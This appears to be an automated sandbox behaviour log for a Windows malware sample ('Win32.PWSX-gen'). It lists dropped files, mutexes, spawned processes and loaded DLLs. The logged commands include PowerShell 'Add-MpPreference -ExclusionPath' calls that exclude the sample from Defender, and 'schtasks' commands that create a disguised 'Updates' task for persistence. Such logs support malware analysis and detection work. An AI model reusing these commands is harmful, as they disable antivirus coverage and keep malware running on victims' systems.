            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeCode function: 16_2_00418A00 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,16_2_00418A00
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeFile created: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeJump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeMutant created: NULL
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-6GPUH1
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5452:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3776:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4536:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4680:120:WilError_03
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeFile created: C:\Users\user\AppData\Local\Temp\tmpAAF6.tmpJump to behavior
            Source: SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeReversingLabs: Detection: 21%
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeFile read: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe"
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ZRuVeAoBoxootS" /XML "C:\Users\user\AppData\Local\Temp\tmpAAF6.tmp"
            Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe"
            Source: unknownProcess created: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ZRuVeAoBoxootS" /XML "C:\Users\user\AppData\Local\Temp\tmpC13D.tmp"
            Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeProcess created: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe "C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe"
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeProcess created: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe "C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe"
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe"Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe"Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ZRuVeAoBoxootS" /XML "C:\Users\user\AppData\Local\Temp\tmpAAF6.tmp"Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe"Jump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ZRuVeAoBoxootS" /XML "C:\Users\user\AppData\Local\Temp\tmpC13D.tmp"Jump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeProcess created: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe "C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe"Jump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeProcess created: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe "C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe"Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeSection loaded: dwrite.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeSection loaded: windowscodecs.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeSection loaded: slc.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeSection loaded: windowscodecs.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeSection loaded: dwrite.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeSection loaded: windowscodecs.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeSection loaded: slc.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
